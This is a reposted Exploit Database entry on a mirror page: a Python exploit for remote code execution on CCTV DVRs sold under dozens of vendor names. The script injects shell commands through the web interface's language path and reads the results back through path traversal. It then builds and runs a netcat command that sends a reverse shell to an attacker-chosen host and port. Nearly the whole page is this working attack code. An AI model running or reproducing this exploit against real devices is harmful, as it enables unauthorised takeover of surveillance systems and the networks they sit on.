Multiple CCTV-DVR Vendors – Remote Code Execution

• Exploit Database
• 141 阅读

• 作者： K1P0D
  日期： 2016-03-23
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/39596/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211

  #!/usr/bin/python   # Blog post: http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html   &apos;&apos;&apos; Vendors List   Ademco ATS Alarmes technolgy and ststems Area1Protection Avio Black Hawk Security Capture China security systems Cocktail Service Cpsecured CP PLUS Digital Eye&apos;z no website Diote Service & Consulting DVR Kapta ELVOX ET Vision Extra Eye 4 U eyemotion EDS Fujitron Full HD 1080p Gazer Goldeye Goldmaster Grizzly HD IViewer Hi-View Ipcom IPOX IR ISC Illinois Security Cameras, Inc. JFL Alarmes Lince LOT Lux Lynx Security Magtec Meriva Security Multistar Navaio NoVus Optivision PARA Vision Provision-ISR Q-See Questek Retail Solution Inc RIT Huston .com ROD Security cameras Satvision Sav Technology Skilleye Smarteye Superior Electrial Systems TechShell TechSon Technomate TecVoz TeleEye Tomura truVue TVT Umbrella United Video Security System, Inc Universal IT Solutions US IT Express U-Spy Store Ventetian V-Gurad Security Vid8 Vtek Vision Line Visar Vodotech.com Vook Watchman Xrplus Yansi Zetec ZoomX &apos;&apos;&apos;   from sys import argv import optparse from urlparse import urlparse from re import compile import socket import requests from requests.exceptions import ConnectionError, Timeout, ContentDecodingError from socket import timeout         def main():   # parse command line options and atguments optparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0]) optparser.add_option(&apos;-c&apos;,&apos;--check&apos;,action="store_true",dest="checkvuln", default=False, help="Check if target is vulnerable") optparser.add_option(&apos;-e&apos;,&apos;--exploit&apos;, action="store", type="string", dest="connback", help="Fire the exploit against the given target URL")   (options, args) = optparser.parse_args()   try: target = args[0] except IndexError: optparser.print_help() exit()   target_url = urlparse(target)   # validating hostname if not target_url.hostname: print "[X] supplied target \"%s\" is not a valid URL" % target optparser.print_help() exit()   # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality. socket.setdefaulttimeout(10)   # is -c flag on check if target url is vulnrable. if options.checkvuln is True: print "[!] Checking if target \"%s\" is vulnable..." % target_url.netloc try:   # Write file raw_url_request(&apos;%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js&apos; % (target_url.scheme, target_url.netloc))   # Read the file. response = raw_url_request(&apos;%s://%s/../../../../../../../mnt/mtd/test&apos; % (target_url.scheme, target_url.netloc))     # remove it.. raw_url_request(&apos;%s://%s//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js&apos; % (target_url.scheme, target_url.netloc))   except (ConnectionError, Timeout, timeout) as e: print "[X] Unable to connect. reason: %s.exiting..." % e.message return if response.text[0] != &apos;1&apos;: print "[X] Expected response content first char to be &apos;1&apos; got %s. exiting..." % response.text return   print "[V] Target \"%s\" is vulnerable!" % target_url.netloc       # if -e is on then fire exploit, if options.connback is not None:   # Validate connect-back information. pattern = compile(&apos;(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)&apos;) match = pattern.search(options.connback) if not match: print "[X] given connect back \"%s\" should be in the format for host:port" % options.connback optparser.print_help() exit()   # fire remote code execution!   # Three .. try: raw_url_request(&apos;%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a&apos; % (target_url.scheme, target_url.netloc, match.group(&apos;host&apos;), match.group(&apos;port&apos;)))     # Two ...   raw_url_request(&apos;%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a&apos; % (target_url.scheme, target_url.netloc))     # One. Left off! raw_url_request(&apos;%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s&apos; % (target_url.scheme, target_url.netloc))   except (ConnectionError, Timeout, timeout) as e: print "[X] Unable to connect reason: %s.exiting..." % e.message       print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s" \ % (match.group(&apos;host&apos;), match.group(&apos;port&apos;))       # Disabling URL encode hack def raw_url_request(url): r = requests.Request(&apos;GET&apos;) r.url = url r = r.prepare() # set url without encoding r.url = url   s = requests.Session() return s.send(r)       if __name__ == &apos;__main__&apos;: main()